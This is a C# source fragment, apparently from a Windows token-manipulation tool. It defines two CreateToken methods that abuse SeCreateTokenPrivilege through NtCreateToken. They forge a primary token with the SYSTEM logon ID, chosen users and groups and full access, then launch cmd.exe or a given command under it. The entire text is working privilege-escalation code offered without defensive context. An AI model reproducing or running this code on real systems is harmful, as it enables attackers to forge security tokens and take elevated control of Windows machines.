//SeCreateTokenPrivilege
public void CreateToken(string[] groups, string command)
{
if (!_CheckPrivileges())
{
return;
}
uint LG_INCLUDE_INDIRECT = 0x0001;
uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
Console.WriteLine();
Console.WriteLine("_SECURITY_QUALITY_OF_SERVICE");
Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
{
Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
};
IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
Console.WriteLine("_OBJECT_ATTRIBUTES");
wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
{
Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),
RootDirectory = IntPtr.Zero,
Attributes = 0,
ObjectName = IntPtr.Zero,
SecurityDescriptor = IntPtr.Zero,
SecurityQualityOfService = hSecurityContextTrackingMode
};
TokenInformation ti = new TokenInformation(hWorkingToken);
ti.SetWorkingTokenToSelf();
ti.GetTokenSource();
ti.GetTokenUser();
ti.GetTokenGroups();
ti.GetTokenPrivileges();
ti.GetTokenOwner();
ti.GetTokenPrimaryGroup();
ti.GetTokenDefaultDacl();
Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
long expirationTime = long.MaxValue / 2;
phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
//out/ref hToken - required
//Ref Expirationtime - required
uint ntRetVal = ntdll.NtCreateToken(
out phNewToken,
Winnt.TOKEN_ALL_ACCESS,
ref objectAttributes,
Winnt._TOKEN_TYPE.TokenPrimary,
ref systemLuid,
ref expirationTime,
ref ti.tokenUser,
ref ti.tokenGroups,
ref ti.tokenPrivileges,
ref ti.tokenOwner,
ref ti.tokenPrimaryGroup,
ref ti.tokenDefaultDacl,
ref ti.tokenSource
);
if (0 != ntRetVal)
{
Misc.GetNtError("NtCreateToken", ntRetVal);
new TokenInformation(phNewToken).GetTokenUser();
}
if (string.IsNullOrEmpty(command))
{
command = "cmd.exe";
}
SetWorkingTokenToNewToken();
StartProcessAsUser(command);
}
//SeCreateTokenPrivilege
public void CreateToken(string userName, string[] groups, string command)
{
Console.WriteLine("[*] Creating Token for {0}", userName);
if (!_CheckPrivileges())
{
return;
}
uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
#region _OBJECT_ATTRIBUTES
Console.WriteLine();
Console.WriteLine("[*] _SECURITY_QUALITY_OF_SERVICE");
Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
{
Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
};
IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
Console.WriteLine("[*] _OBJECT_ATTRIBUTES");
wudfwdm._OBJECT_ATTRIBUTES objectAttributes = new wudfwdm._OBJECT_ATTRIBUTES()
{
Length = (uint)Marshal.SizeOf(typeof(wudfwdm._OBJECT_ATTRIBUTES)),
RootDirectory = IntPtr.Zero,
Attributes = 0,
ObjectName = IntPtr.Zero,
SecurityDescriptor = IntPtr.Zero,
SecurityQualityOfService = hSecurityContextTrackingMode
};
#endregion
string domain = string.Empty;
if (userName.Contains(@"\"))
{
string[] split = userName.Split('\\');
domain = split[0];
userName = split[1];
}
Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
long expirationTime = long.MaxValue / 2;
Ntifs._TOKEN_USER tokenUser;
CreateTokenUser(domain, userName, out tokenUser);
Ntifs._TOKEN_GROUPS tokenGroups;
Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
CreateTokenGroups(domain, userName, out tokenGroups, out tokenPrimaryGroup, groups);
Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges;
CreateTokenPrivileges(tokenUser, tokenGroups, out tokenPrivileges);
Ntifs._TOKEN_OWNER tokenOwner;
CreateTokenOwner(domain, userName, out tokenOwner);
Winnt._TOKEN_DEFAULT_DACL tokenDefaultDacl;
CreateTokenDefaultDACL(out tokenDefaultDacl);
Winnt._TOKEN_SOURCE tokenSource;
CreateTokenSource(out tokenSource);
phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
//out/ref hToken - required
//Ref Expirationtime - required
uint ntRetVal = ntdll.NtCreateToken(
out phNewToken,
Winnt.TOKEN_ALL_ACCESS,
ref objectAttributes,
Winnt._TOKEN_TYPE.TokenPrimary,
ref systemLuid,
ref expirationTime,
ref tokenUser,
ref tokenGroups,
ref tokenPrivileges,
ref tokenOwner,
ref tokenPrimaryGroup,
ref tokenDefaultDacl,
ref tokenSource
);
if (0 != ntRetVal)
{
Misc.GetNtError("NtCreateToken", ntRetVal);
return;
}
Console.WriteLine();
DesktopACL desktop = new DesktopACL();
desktop.OpenDesktop();
desktop.OpenWindow();
Console.WriteLine();
if (string.IsNullOrEmpty(command))
{
command = "cmd.exe";
}
SetWorkingTokenToNewToken();
StartProcessAsUser(command);
}
